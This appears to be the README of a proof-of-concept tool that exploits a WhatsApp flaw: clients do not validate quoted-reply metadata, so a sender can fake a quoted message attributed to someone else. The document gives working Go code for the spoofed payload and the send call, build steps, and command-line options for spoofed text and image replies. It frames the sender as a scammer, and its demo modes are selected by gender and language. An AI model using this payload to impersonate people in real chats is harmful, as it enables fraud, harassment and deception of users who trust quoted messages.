send All official WhatsApp clients, upon receiving a "Message Reply" payload (QuotedMessage), do not validate whether the "ContextInfo" of this "QuotedMessage" is valid/exists ("StanzaId" and "Participant"). This allows a malicious actor to send in private chats or groups a "QuotedMessage" of a message that never existed on behalf of another person. This is highly critical and dangerous.
Latest version on all platforms
Users: UserA, UserB; UserA is not known by UserB
UserA (SCAMMER) sends a spoofed messages to UserB in response to a message that UserB did never send
Spoofed message payload:
msg := &waProto.Message{
ExtendedTextMessage: &waProto.ExtendedTextMessage{
Text: proto.String("Some text"),
ContextInfo: &waProto.ContextInfo{
StanzaId: proto.String("Some Random ID"), //Random ID
Participant: proto.String("[email protected]"), //Spoofed user ID
QuotedMessage: &waProto.Message{
Conversation: proto.String("Some Spoofed text"), //QuotedMessage Spoofed text
},
},
},
}Send the Spoofed Payload:
resp, err := cli.SendMessage(context.Background(), chatID, msg)
// chatID is the ID of the chat you want to send the message to, can be a group or the same number as the spoofed user IDgo mod download
go get go build ./whats-spoofinggetgroup <jid>listgroupssend-spoofed-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_text>|<text>send-spoofed-img-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_file> <spoofed_text>|<text>send-spoofed-demo <toGender:boy|girl> <language:br|en> <chat_jid> <spoofed_jid>send-spoofed-demo-img <toGender:boy|girl> <language:br|en> <spoofed_jid> <spoofed_img>